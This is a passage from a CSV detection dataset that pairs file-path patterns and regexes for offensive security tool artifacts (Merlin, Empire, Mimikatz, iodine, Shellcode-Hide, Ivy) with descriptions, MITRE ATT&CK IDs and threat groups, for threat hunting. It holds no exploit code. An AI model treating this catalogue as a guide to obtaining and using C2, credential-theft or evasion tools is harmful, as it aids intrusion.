- T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*/Invoke-CleverSpray.git*",".{0,1000}\/Invoke\-CleverSpray\.git.{0,1000}","offensive_tool_keyword","Invoke-CleverSpray","Password Spraying Script detecting current and previous passwords of Active Directory User","T1110.003 - T1110.001","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/wavestone-cdt/Invoke-CleverSpray","1","1","N/A","10","1","60","11","2021-09-09T07:35:32Z","2018-11-29T10:05:25Z" "*/Invoke-DCOM.ps1*",".{0,1000}\/Invoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\/Invoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-ExcelMacroPivot.ps1*",".{0,1000}\/Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 
- TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-HostEnum.ps1*",".{0,1000}\/Invoke\-HostEnum\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "*/Invoke-InternalMonologue.ps1*",".{0,1000}\/Invoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" 
"*/Invoke-Mimikatz.ps1*",".{0,1000}\/Invoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-PowerThIEf.ps1*",".{0,1000}\/Invoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/Invoke-RunAs.ps1*",".{0,1000}\/Invoke\-RunAs\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1084","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Invoke-SMBRemoting.git*",".{0,1000}\/Invoke\-SMBRemoting\.git.{0,1000}","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","1","N/A","9","1","29","9","2024-05-01T13:42:06Z","2023-09-06T16:00:47Z" "*/Invoke-Stealth.git*",".{0,1000}\/Invoke\-Stealth\.git.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" 
"*/invoke-stealth.php*",".{0,1000}\/invoke\-stealth\.php.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/Invoke-Stealth.ps1*",".{0,1000}\/Invoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*/Invoke-WMILM.ps1*",".{0,1000}\/Invoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/iodine-*-windows.zip*",".{0,1000}\/iodine\-.{0,1000}\-windows\.zip.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/iodine.exe*",".{0,1000}\/iodine\.exe.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/iodine.git*",".{0,1000}\/iodine\.git.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/iodine-master/*",".{0,1000}\/iodine\-master\/.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","1","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*/io-tl/Mara*",".{0,1000}\/io\-tl\/Mara.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "*/IOXIDResolver.py*",".{0,1000}\/IOXIDResolver\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ip_spoof.rb*",".{0,1000}\/ip_spoof\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/IPayloadService.*",".{0,1000}\/IPayloadService\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/ip-forwarding.nse*",".{0,1000}\/ip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/IPfuscation.cpp*",".{0,1000}\/IPfuscation\.cpp.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/IPfuscation.exe*",".{0,1000}\/IPfuscation\.exe.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp 
socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*/ip-geolocation-geoplugin.nse*",".{0,1000}\/ip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-ipinfodb.nse*",".{0,1000}\/ip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-bing.nse*",".{0,1000}\/ip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-google.nse*",".{0,1000}\/ip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-map-kml.nse*",".{0,1000}\/ip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-geolocation-maxmind.nse*",".{0,1000}\/ip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ip-https-discover.nse*",".{0,1000}\/ip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipidseq.nse*",".{0,1000}\/ipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi_passwords.txt*",".{0,1000}\/ipmi_passwords\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ipmi-brute.nse*",".{0,1000}\/ipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-cipher-zero.nse*",".{0,1000}\/ipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipmi-version.nse*",".{0,1000}\/ipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipv6-multicast-mld-list.nse*",".{0,1000}\/ipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipv6-node-info.nse*",".{0,1000}\/ipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ipv6-ra-flood.nse*",".{0,1000}\/ipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-botnet-channels.nse*",".{0,1000}\/irc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-brute.nse*",".{0,1000}\/irc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-info.nse*",".{0,1000}\/irc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-sasl-brute.nse*",".{0,1000}\/irc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irc-unrealircd-backdoor.nse*",".{0,1000}\/irc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/irs.exe*",".{0,1000}\/irs\.exe.{0,1000}","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","88","6","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" "*/iscsi-brute.nse*",".{0,1000}\/iscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iscsi-info.nse*",".{0,1000}\/iscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/isns-info.nse*",".{0,1000}\/isns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/itsdangerous.zip*",".{0,1000}\/itsdangerous\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/ItWasAllADream.git*",".{0,1000}\/ItWasAllADream\.git.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*/Ivy/Cryptor*",".{0,1000}\/Ivy\/Cryptor.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*/Ivy/Loader/*",".{0,1000}\/Ivy\/Loader\/.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*/jackit*",".{0,1000}\/jackit.{0,1000}","offensive_tool_keyword","jackit","Wireless Mouse and Keyboard Vulnerability This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. 
